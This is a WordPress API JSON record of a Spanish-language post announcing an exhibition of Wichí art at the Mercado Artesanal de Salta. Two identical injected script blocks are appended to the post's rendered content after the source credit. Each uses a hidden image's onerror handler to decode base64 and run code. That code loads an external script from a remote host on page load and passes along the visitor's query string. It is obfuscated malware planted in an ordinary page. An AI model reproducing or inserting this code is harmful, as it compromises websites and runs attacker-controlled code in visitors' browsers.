{"id":1311,"date":"2022-08-16T12:26:20","date_gmt":"2022-08-16T15:26:20","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1311"},"modified":"2025-08-14T00:38:22","modified_gmt":"2025-08-14T03:38:22","slug":"muestra-de-arte-wichi-en-el-mercado-artesanal-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1311","title":{"rendered":"Muestra de arte wich\u00ed en el Mercado Artesanal de Salta"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#564004\">Lhajwus Lhenek: \u201cEl arte de mis manos, el fruto de mis manos\u201d se inaugurar\u00e1 el jueves 18 de agosto a las 19 horas y permanecer\u00e1 hasta el 31 de agosto, con entrada gratuita.<\/h4>\n\n\n\n<p>La exposici\u00f3n propone una instalaci\u00f3n de 50 obras en fibras de chaguar y cer\u00e1mica, cada una de ellas con mensajes de la Madre Naturaleza en un contexto donde est\u00e1 siendo contaminada, talada y explotada.<\/p>\n\n\n\n<p>&nbsp;Lhajwus Lhenek es la primera muestra de arte wich\u00ed, con curadur\u00eda intercultural, organizada por artistas y poetas del Centro Cultural Tewok, de la Comunidad wich\u00ed de Santa Victoria 2, Fundaci\u00f3n Cebil y Uni\u00f3n Aut\u00f3noma de Comunidades Originarias del Pilcomayo (UACOP), con el apoyo de la Secretar\u00eda de Cultura de la Provincia a trav\u00e9s del Fondo Ciudadano de Desarrollo Cultural 2021.<\/p>\n\n\n\n<p>&nbsp;Esta muestra tiene como objetivo visibilizar el arte wich\u00ed como patrimonio vivo e intangible de la Provincia. La misma se inaugurar\u00e1 el jueves 18 de agosto a las 19 horas y permanecer\u00e1 hasta el 31 de agosto de 10 a 13 y de 16 a 20 horas, con entrada gratuita en el Centro de Interpretaci\u00f3n del Mercado Artesanal de Salta, Av. San Mart\u00edn 2555.<\/p>\n\n\n\n<p>\u00a0Para m\u00e1s informaci\u00f3n:\u00a0<a href=\"https:\/\/fundacioncebil.org\/lhajwus-lhenek\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/fundacioncebil.org\/lhajwus-lhenek\/<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/muestra-de-arte-wichi-en-el-mercado-artesanal-de-salta-84146\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Lhajwus Lhenek: \u201cEl arte de mis manos, el fruto de mis manos\u201d se inaugurar\u00e1 el jueves 18 de agosto a las 19 horas y permanecer\u00e1 hasta el 31 de agosto, con entrada gratuita. La exposici\u00f3n propone una instalaci\u00f3n de 50 obras en fibras de chaguar y cer\u00e1mica, cada una de ellas con mensajes de la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1312,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-1311","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1311"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1311"}],"version-history":[{"count":5,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1311\/revisions"}],"predecessor-version":[{"id":7392,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1311\/revisions\/7392"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1312"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1311"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1311"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1311"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}